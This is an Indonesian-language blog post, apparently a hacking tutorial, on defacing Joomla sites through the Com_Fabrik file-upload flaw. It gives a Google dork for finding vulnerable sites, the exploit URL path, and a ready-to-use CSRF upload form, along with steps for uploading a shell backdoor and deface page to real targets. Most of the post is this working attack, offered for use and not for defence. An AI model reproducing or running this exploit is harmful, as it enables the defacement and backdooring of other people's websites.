Cara Deface Metode Com_Fabrik Dengan CSRF
Assalamualaikum Wr.Wb
ketemu lagi dengan w Falka
Terimakasih telah berkunjung ke web sederhana ini ;v
Kali ini w akan memberikan Tutorial Deface Metode Com_fabrik With CSRF
Terimakasih telah berkunjung ke web sederhana ini ;v
Kali ini w akan memberikan Tutorial Deface Metode Com_fabrik With CSRF
Sebelum deface sebaiknya kita mempersiapkan alat dan bahan
-Shell Backdoor Ambil disini
-Shell Backdoor Ambil disini
-Script Deface (Saya rasa udah punya ya;v)
-Dork
Inurl:index.php?Option=Com_Fabrik
-Exploit
/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
-CSRF
<title> FUCK you JMboed</title>
<center>
<img width="300" height"300" src='https://img.duniaku.net/2017/12/1512457422-sagiri-eromanga-700x394.jpg'/>
<body style="color: white; background-color:black;">
<h1 style="font-size:40px; line-height:100px; font-weight:bold;">CSRF Com_Fabrik FALKA</h1>
<font size="1" color="aqua">
<b>jangan lupa ubah dulu dibagian action ="link target"</b>
<!--
//UBAH ACTION NYA DULU BANGSAD
//Contoh : action="YANG INI GANTI SAMA TARGET KLEAN"
//Letak yg diganti buat yg belum tau ? (bawahnya simbol ?)
-->
<form method="POST" action="www.webvuln.co.li/index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload" enctype="multipart/form-data">
<input type="file" name="file"><button>Gass Bangsadd!1!1!</button>
</form>
</font>
</center>
<br><br>
<font size="5" color="yellow">
<b><u>Exploit :</u></b>
<br>
/index.php?option=com_fabrik&format=raw&<br>task=plugin.pluginAjax&<br>plugin=fileupload&method=ajax_upload
</font>
Note
merah : untuk web vuln
biru : Exploit
1. Dorking Dolo ke google seperti biasa. Kembangkan dork di atas biar dapet yg peravan;v
3. Jika Vuln akan ada {"filepath":null,"uri":null}
4. Buka csrf pastekan atau tempel web dan exploit yg kita dapat
6.kalau udh terupload Gambarnya kyk dibawah,, Tinggal liat aja hasilnya;v,,
VVIBU Terkontoel:v
BalasHapusMehwuwwhwuhw
BalasHapus